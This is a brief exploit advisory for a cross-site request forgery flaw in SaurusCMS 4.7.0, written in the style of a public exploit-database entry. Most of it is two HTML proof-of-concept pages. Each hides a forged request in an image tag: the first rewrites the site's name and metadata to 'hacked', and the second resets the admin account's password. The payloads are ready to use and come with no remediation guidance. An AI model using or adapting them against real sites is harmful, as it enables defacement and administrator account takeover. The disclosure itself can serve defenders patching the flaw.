# Author: Fady Mohammed Osman (cute hacker)# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz# Version: 4.7.0# Tested on: Ubuntu 10.04# CVE : [Not available]# This vulnerability allows a malicious hacker to change password of a userand also it allows changing the website information.
PoC 1:<html><head><title>Saurus CSRF : Change site information</title></head><body><img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone="></body></html>
PoC 2:<html><head><title>Saurus CSRF : Change user's password</title></head><body><img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1"></body></html>
